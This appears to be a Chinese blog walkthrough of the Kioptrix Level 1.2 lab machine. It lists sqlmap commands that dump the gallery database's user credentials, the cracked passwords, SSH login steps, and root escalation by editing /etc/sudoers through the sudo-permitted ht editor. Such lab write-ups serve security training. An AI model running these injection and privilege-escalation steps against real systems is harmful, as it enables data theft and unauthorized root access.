首页 > 其他分享 >Kioptrix Level-1.2

Kioptrix Level-1.2

时间:2024-09-18 13:20:52浏览次数:3  
标签:Kioptrix 0.159 1.2 Level -- sudo 192.168 ssh gallery

信息收集

sudo arp-scan -l

nmap -sS -A 192.168.0.159

目标靶机开放了80端口http访问,浏览器访问查看

使用dirb进行目录枚举

网站探测

根据页面提示,点击 blog ,得到线索

http://kioptrix3.com/gallery

host 绑定,将网站域名绑定与 192.168.0.159 绑定

C:\windows\system32\drivers\etc\hosts 
在host文件里添加

然后访问

SQL注入利用

发现 url 中含 id 参数,sqlmap 测试SQL注入,存在

python sqlmap.py -u "http://192.168.0.159/gallery/gallery.php?id=1" --batch --dbs			# 查询数据库名
python sqlmap.py -u "http://192.168.0.159/gallery/gallery.php?id=1" --batch -D gallery --tables			# 查询gallery库下数据表
python sqlmap.py -u "http://192.168.0.159/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users --dump		查询 user 表下用户


 
# admin:n0t7t1k4
# dreg:0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)
# loneferret:5badcaf789d3d1d09794d8f021f40f0e (starwars)

getshell

尝试另两组用户名密码,发现可通过 ssh 远程连接

ssh [email protected]   # kali直接连接会报错

需要凭证

ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
ssh -oHostKeyAlgorithms=+ssh-dss [email protected]

提权

发现 loneferret 用户存在利用点

cat /etc/passwd

查看用户家目录

ls
cat CompanyPolicy.README

sudo -l
sudo /usr/local/bin/ht

ht编辑器修改:
export TERM=xterm
sudo /usr/local/bin/ht
按 F3 键搜索文件中的 " /etc/sudoers" 单词
按 F2 键将以下行添加到文件中:/bin/bash
F2 保存 --> F10 退出

sudo /bin/bash
id
whoami
提权成功

标签:Kioptrix,0.159,1.2,Level,--,sudo,192.168,ssh,gallery
From: https://blog.csdn.net/2301_78080214/article/details/142220310

相关文章

  • Spread.NET 17.1.2 FOR WinForms
    Spread.NET17.1.2全球销量第一的C#.NET电子表格,拥有超过500个Excel函数在C#.NET中提供真正类似Excel的电子表格体验,且不依赖Excel。创建财务、预算/预测、科学、工程、医疗保健、保险、教育、制造和许多其他类似的业务应用程序。使用全面的API创建企业电子表......
  • xss-labs靶场:level11攻略 抓包工具的巧妙利用
    攻略第十关后稍作休整,我们继续来看第十一关:和上一关一样,提供给我们的仅有的参数是URL中的keyword,很明显,这个参数是无法利用的,我们查看页面源代码发现依然是有一个隐藏表单的存在,但是,我们发现表单中多了一个参数t_ref即<formid="search"><inputname="t_link"value=""t......
  • 今日总结1.2
    一、软件设计模式的产生背景“设计模式”这个术语最初并不是出现在软件设计中,而是被用于建筑领域的设计中。1977年,美国著名建筑大师、加利福尼亚大学伯克利分校环境结构中心主任克里斯托夫·亚历山大(ChristopherAlexander)在他的著作《建筑模式语言:城镇、建筑、构造(APatternLa......
  • 11.2.0.4 RAC,手动方式安装PSU补丁
    1、前言注意:Oracle不建议客户使用手动方式进行补丁安装,客户应该使用opatchauto方式进行补丁安装工作。但是,在opatchauto的过程中如果出现问题,我们可以将本文档中的步骤作为临时解决方法。 2、故障描述客户有一套Exadata环境下的11.2.0.4RAC,近期进行安全扫描时,提示一些数据......
  • 引言 -- 1.2 衡量计算机的指标
    衡量计算机的指标怎么样来衡量一台计算机的好坏呢?计算机的衡量指标有很多,其中性能、价格和功耗是三个主要指标。计算机的性能计算机的第一个重要指标就是性能。前面说的用来进行核模拟的高性能计算机对一个国家来说具有战略意义,算得越快越好。又如中央气象台用于天气预报的计算......
  • WordBN字远笔记!更新1.2.2版本|Markdown编辑器新增高亮功能,界面新增深色模式
    WordBN字远笔记1.2.2版本更新描述WordBN字远笔记在1.2.2版本中进行了多项重要的更新与改进,旨在提升用户的编辑体验和视觉舒适度。以下是本次更新的两大亮点:Markdown编辑器新增高亮功能以及界面新增深色模式。1.Markdown编辑器新增高亮功能在1.2.2版本中,WordBN字远笔记的M......
  • 第三十二节 kubeadm部署k8s 1.28.x高可用集群
    底层走docker底层走containerd容器操作系统:openEuler-24.03主机名:cat/etc/hosts主机3台192.168.80.54lyc-80-54master192.168.80.55lyc-80-55master192.168.80.56lyc-80-56master192.168.80.56lyc-80-57worker192.168.80.56lyc-80-58worker系统关闭selin......
  • 3.4.1.2 IPIPE对Linux中断号的改造
    点击查看系列文章=》 InterruptPipeline系列文章大纲-CSDN博客3.4.1.2IPIPE对Linux中断号的改造    在IPIPEdomain中,IPIPE_NR_IRQS代表中断总数量,在代码中经常用到,最具代表的就是下图中定义structipipe_irqdescirqs[IPIPE_NR_IRQS].        先列一......
  • DataGrip 2021.2.2如何导出.sql文件
     目录Blue留声机: 导出文件:1、点击要导出的table,选择Exportwith'mysqldump'2、选择一下数据库备份数据的路径,选择导出sql文件存放的位置导入文件: 概览:1.第一步,进入运维管理端,通过命令行进入数据库2.第二步,切换数据库3.第三步,导入sql文件source无法导入sql文件......
  • 动手学运动规划:1.2 车辆运动学:阿克曼转向模型
    你见过凌晨三点的洛杉矶吗—科比布莱恩特......